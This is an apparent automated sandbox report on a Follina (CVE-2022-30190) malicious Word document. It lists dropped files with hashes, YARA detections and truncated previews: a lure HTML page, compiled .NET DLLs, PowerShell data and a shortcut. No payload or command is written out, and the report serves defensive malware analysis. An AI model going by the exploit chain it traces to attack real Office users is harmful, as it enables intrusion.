                                                                                                                                                                    Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6241
                                                                                                                                                                    Entropy (8bit):4.836014560592255
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                    MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                    SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                    SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                    SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E7589548.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                    • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\E7589548.htm, Author: Joe Security
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6241
                                                                                                                                                                    Entropy (8bit):4.836014560592255
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                    MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                    SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                    SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                    SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                    • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\123[1].RES, Author: Joe Security
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6241
                                                                                                                                                                    Entropy (8bit):4.836014560592255
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                    MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                    SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                    SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                    SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):22108
                                                                                                                                                                    Entropy (8bit):5.600449610443428
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:mtCFjsVX68/ZPK02XiySgRjultIsnonvXg3hInYMRV4NxFFq82bSTtaY0y:068/5KXXbVClt/866Dnqq8jtz
                                                                                                                                                                    MD5:B538DFB7D3FA26250E097C09F4D2882C
                                                                                                                                                                    SHA1:D27F31DE75C5C3766228ED5F215651D374184B41
                                                                                                                                                                    SHA-256:314810259AE528781087A1B3D82710BA86DE148AB2B4F2526190319E3F8E9D8C
                                                                                                                                                                    SHA-512:2DFC1E7ECF74F52D1790DB0E1E0827F32E9CF6EFFE88AD1DDA783B88C8AB597FC5AEECB2883934A7D6507506DA2AADB945D839276DACD06AB1E89CA693626EE1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:@...e...........P.......K...T.J.J.....7..............@..........H...............<@.^.L."My...:G..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):3584
Entropy (8bit):3.08683667520355
Encrypted:false
SSDEEP:24:etGSks9pz1qlkCe745Q7GslPordjvX5ekjV4gztkZfRy6Iv+POBWI+ycuZhNOWas:6Ppqb927GslPmDRjyJRgk1ul5a3Vq
MD5:E7C64FF6232E03C4EAFFDDCB24D61F88
SHA1:F2FCB5A38F5E568D88C8CED8063CCA813EB96C08
SHA-256:2D952F423B31924D5F6F3A7C54F64E92527379FF35D3A85359AA97F3A7EC8C91
SHA-512:F4AC74A1D03A2D89EFA13AF3FABE47F11701CBE84F3BD630094579BF23E97C830B715333C0C0F84B3BB4153703D558FE889239EF4CEE7563FFCB1774F8AAC7F9
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...E..b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.107637294577624
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryQLWak7YnqqbLHPN5Dlq5J:+RI+ycuZhNOWakSnHPNnqX
MD5:3C4ACABA50E1C037A7D43069DD50D55E
SHA1:B739096A4EC05D4C531B1F45A77C2FB48965B0DA
SHA-256:962732B5E808058DBBED9E8E527E0C8D3B5D91399CB3517362AEFFFD2DAFCFAD
SHA-512:D48C021312417D3A95F79C97509DB6D917F83169421EF0B241D5834BD2B9569983FE3AA75F74EE61DD67D4B70E9BEA0729DBFA6FA731A628F18C5D5D5D90EBD7
Malicious:false
Reputation:unknown
Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.4.3.k.k.f.i.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...3.4.3.k.k.f.i.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
Category:dropped
Size (bytes):1364
Entropy (8bit):4.106801882536675
Encrypted:false
SSDEEP:24:H6C9A++fUoKB5EWDfHZhKBffuYfII+ycuZhNWgakSJFPNnq9Wd:ox8dHKZWYg1ulWga3Jfq9m
MD5:F75340B901239EE7D68F2A93DE12E34C
SHA1:23E76BA9651E6EB3C7B2C49C0220200AF5176F4D
SHA-256:F2634B27927DAD999D7162615B98A45A5C3BA136C996A3CD0445ECB586B23B61
SHA-512:566287DDEC7C85ECB62B653A7BFD080240E674BF63E572A0F38100C69CA3D93C227847EE8F855F9C45B13F73F03E8138F9E09B7B657B611433B1E272A1776CD1
Malicious:false
Reputation:unknown
Preview:L...@..b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\ej5ypzxn\CSCDA8FA8A1B40543BD93F61BBD49C66867.TMP................(......<X..qe;Y..........4.......C:\Users\user\AppData\Local\Temp\RES473B.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.j.5.y.p.z.x.n...d.l.l.....(.....L.e.g.a.l.C.o.p.

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
Category:dropped
Size (bytes):1364
Entropy (8bit):4.09396945647647
Encrypted:false
SSDEEP:24:H8C9A++fNsdG9DfHdhKBffuYfII+ycuZhNdakSLPNnq9Wd:GxyABLKZWYg1ulda3hq9m
MD5:500DC3F5C427AB8A26D452CE585BB937
SHA1:F7586DD3F23B6D4651C930D5F78128C0EFE52787
SHA-256:894F109A9ADF0F1D53C6305CCB98989B18D76AE8F276C5508ACABDB479C8099D
SHA-512:6448BAA46BECD305E2F09225B36A8A2EA1467EC5C6D95AD72B65AA1FC9F3AAF92F2E1BDF3156533F787D341433EA46BA102DB627E2C0C3BCE439CE75F1727CFE
Malicious:false
Reputation:unknown
Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\mj2renji\CSCB9869C7619004D828AB967DBC926ADAE.TMP.....................&.c*..PX.3..........4.......C:\Users\user\AppData\Local\Temp\RES4765.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.j.2.r.e.n.j.i...d.l.l.....(.....L.e.g.a.l.C.o.p.

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
Category:dropped
Size (bytes):1364
Entropy (8bit):4.09961110919796
Encrypted:false
SSDEEP:24:HgC9A++fZeADfHwhKBffuYfII+ycuZhNOWakSnHPNnq9Wd:6xzyKZWYg1ul5a3Vq9m
MD5:E7280112D4F81F7F338E7E23886C9313
SHA1:1268BCB973B125C6703AF83A9833D60D8C5D0CB9
SHA-256:47857740AA0BE7AFF335D2A09FAB4895958C6BA9A6D2295F11E0A6DBFBDC83B1
SHA-512:656E1D6C3A183E218F0A9CD82FBBEACF18C5EEBEDB026F776BC2EDFA38902B6DF2AE85E060BAB5837003D9F0B144A75D4E67D547FFDDFF50F8C931C7CC468C4B
Malicious:false
Reputation:unknown
Preview:L...F..b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\343kkfih\CSCB428EC43F67D4CCE84BBCBE165F3FF83.TMP...............<J.P..7..0i.P.^..........4.......C:\Users\user\AppData\Local\Temp\RES5EDA.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_70a82460-46c3-4d6a-beee-fc124429976a.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.4.3.k.k.f.i.h...d.l.l.....(.....L.e.g.a.l.C.o.p.

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Reputation:unknown
Preview:1

Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Reputation:unknown
Preview:1

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.112696307080811
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry4gak7YnqqJFPN5Dlq5J:+RI+ycuZhNWgakSJFPNnqX
MD5:AE28F617D1FFD1E53C58048971653B59
SHA1:E4B938A2DB3BDB740B687D7B62248FDA9642D6F3
SHA-256:6939F02575AAD46613236498F5699D58DB56569DE5B2D84E69F4E474B0C8ECF9
SHA-512:A44FB43DEAB5C6E43127B15FF62CA90C2DF7E2CE1D234C617C319587FAD5B9A0CA9E45ACD155C0389C6990223C42BA1BC9DF2160354460B016DFEB78A569944F
Malicious:false
Reputation:unknown
Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.j.5.y.p.z.x.n...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.j.5.y.p.z.x.n...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):5120
Entropy (8bit):3.7885132843835563
Encrypted:false
SSDEEP:48:6ieoPhmKraYZkH8KTibUye2kwjj0JuC+CFSlwY0kc1ulWga3Jfq:1FDaAkHHos2k8FCubIgKJ
MD5:3808E62600B7DD46185B68D58AE7D323
SHA1:5F8F0D3D8F6CE2AC02D438924B81F71CAD7C021A
SHA-256:327DD36754FC5F70ED43039BD6C7EF7340801B4AE9E004EEBEF3A56A6FD6D557
SHA-512:C4C9693BB5C35D97821460C07A42864CDBF7FA29C9E8E85D44282371B5094B65CC58D9A1DA7272AC90A97E5EC8F8E81C3B23E70ACF764C5DD25D5F5FECFE6CD8
Malicious:false
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..b...........!................>*... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ *......H....... ".............................................................."..(....*J.#(....r...p(....*..(....*2~.....(....*....0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.0854106769117537
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygYak7YnqqxNPN5Dlq5J:+RI+ycuZhNdakSLPNnqX
MD5:14C20B82F70526B3632A09A55058C733
SHA1:68DCFB4051EF4BCECC41AD380D708F494F0E904F
SHA-256:C9BE630A247C782FC2FD445F6DD9D5C5A40EB5574C3E9871ACFB3EE319B8FFB7
SHA-512:C982B83F0297D87A0D26E8265C84BCE5F1AC502E3EF1269C9C14D19E9DCA592898C00EE3E8FC5C77F33C5C6B027535BA5FE2FC38F9CAA26FAC0336204335DDEA
Malicious:false
Reputation:unknown
Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.j.2.r.e.n.j.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.j.2.r.e.n.j.i...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):9728
                                                                                                                                                                    Entropy (8bit):4.7977938003878045
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:XXKqedmYoNKvUTCSH3gR8H8FgwSHwBmkwZYPaSJ365O9ieMjQZaoRnIjfK:KElNK8TCSfHyPmkwZ+vKOOQZdnv
                                                                                                                                                                    MD5:9B9920FB503945C91A7DF14BD1CFA79B
                                                                                                                                                                    SHA1:2F9D9780C738D818CFAE3054DBAB971FDC6C94A1
                                                                                                                                                                    SHA-256:68D8F18213236BE68BFA865047F501124F707CDF63A4D3C29A5824D83316AAC1
                                                                                                                                                                    SHA-512:82338C7A18E212B79CC1F8331BF91CFFA45312554235DD09BA27778F51AEDF874E59EDF2BA4EF971EAE79A5A256C09B657121B4554398E9FE05A8860BE1F1A4C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................^<... ...@....... ....................................@..................................<..K....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......$..............@..B................@<......H........$..4............................................................0..%....... ....s.....r...p.(....,..o....*~....*....0..!....... ....s.......(....,..o....*~....*....0...........(....s......o.........o....*....0..@....... ....s..... ....s........(....s.......o....o....&..o....o....&.*.0...........,.. .+.....o.....+).o......t....~....(....,...t.......(....&.o....-....u........,...o......o......+*..o......t....~....(....,...t.......(....&..o....-.....u........,...o.....*
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Read-Only, Archive, ctime=Mon Jun 6 08:04:14 2022, mtime=Tue Jun 7 10:38:53 2022, atime=Mon Jun 6 08:04:14 2022, length=10144, window=hide
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):290
                                                                                                                                                                    Entropy (8bit):3.6693833291173723
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6:4xtYl/EYcL8x1618R/8p6P5FirRGlljsljAlAg+1CKMK/lt:8OEYcR18RUaiQ/jEjA6X/X
                                                                                                                                                                    MD5:36F7B1212F5C8D71F1F60E36676DB5AF
                                                                                                                                                                    SHA1:AB3581195A3C5910EDA5225B3531CC571A7DB176
                                                                                                                                                                    SHA-256:8143C2D057A3CDAE0DD8E184F8C0633CC43EBCC307B35A3F14B73BB73527C50D
                                                                                                                                                                    SHA-512:F013BEF37F29671303C18B4806CF3A411A930D30B325983C22DBA291828A602B7B82C2F414932FD775E93062EE242C986CC09F208BA950B54DEC7C78919F0E1D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:L..................F....!....;.d.y.....)cz...;.d.y...'...........................P.O. .:i.....+00.../E:\...................d.2..'...T.H!.DOC2#K_E.DOC..H.......T.H.T.\..............................d.o.c.2.7.6...d.o.c.x.......=...............-.......<.............L......E:\doc276.docx......
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):64
                                                                                                                                                                    Entropy (8bit):4.601202445739505
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:bDuMJlZepu4omxWKepu4ov:bCSKoy
                                                                                                                                                                    MD5:872838896A4E8A3CADC8379E015B14FC
                                                                                                                                                                    SHA1:049634CD63125E68CC2415079834E119411BAEB7
                                                                                                                                                                    SHA-256:B0B0E3A6D86FFFBDC4A9C3D5C4F9A74970EB8BADB80D21C3C84B90BF947C8330
                                                                                                                                                                    SHA-512:764E9502BB78477D72A12FF70E3141946AB5C938D137DD2F6E6D081B2C1E9644A5C921941A81189F1FFF4C42AF27D199347F4AEF42C5702FD56938F4BAACA30E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:[folders]..Templates.LNK=0..doc276.LNK=0..[misc]..doc276.LNK=0..
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):162
                                                                                                                                                                    Entropy (8bit):2.5804269155138986
